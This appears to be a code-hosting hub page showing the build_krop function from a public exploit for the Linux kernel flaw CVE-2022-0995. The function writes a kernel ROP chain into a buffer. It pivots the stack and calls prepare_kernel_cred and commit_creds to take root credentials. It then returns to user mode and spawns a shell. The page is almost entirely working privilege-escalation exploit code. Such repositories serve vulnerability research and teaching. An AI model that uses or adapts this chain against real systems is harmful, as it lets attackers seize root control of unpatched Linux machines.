MCPcopy Create free account
hub / github.com/bsauce/kernel-exploit-factory / build_krop

Function build_krop

CVE-2022-0995/exploit.c:203–227  ·  view source on GitHub ↗

Note: Must not touch offset 0x10-0x18.

Source from the content-addressed store, hash-verified

201
202// Note: Must not touch offset 0x10-0x18.
203void build_krop(char *buf, uint64_t kbase_addr) {
204 uint64_t *rop;
205 *(uint64_t *)&buf[0x39] = kbase_addr + POP_RSP_RET; // pop rsp; ret;
206 *(uint64_t *)&buf[0x00] = kbase_addr + ADD_RSP_A0_POP_POP_RET; // add rsp, 0xd0; ret;
207
208 rop = (uint64_t *)&buf[0xA8];
209
210 *rop++ = 0xDEADBEEF;
211 *rop++ = 0xDEADBEEF;
212 *rop++ = kbase_addr + POP_RDI_RET;
213 *rop++ = 0; // RDI
214 *rop++ = kbase_addr + PREPARE_KERNEL_CRED;
215 *rop++ = kbase_addr + MOV_RDI_RAX_POP_POP_RET;
216 *rop++ = 0xDEADBEEF;
217 *rop++ = 0xDEADBEEF;
218 *rop++ = kbase_addr + COMMIT_CREDS;
219 *rop++ = kbase_addr + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE;
220 *rop++ = 0xDEADBEEF;
221 *rop++ = 0xDEADBEEF;
222 *rop++ = (uint64_t)get_shell;
223 *rop++ = user_cs;
224 *rop++ = user_rflags;
225 *rop++ = user_sp & 0xffffffffffffff00;
226 *rop++ = user_ss;
227}
228
229int main(int argc, char **argv, char **envp)
230{

Callers 1

mainFunction · 0.70

Calls

no outgoing calls

Tested by

no test coverage detected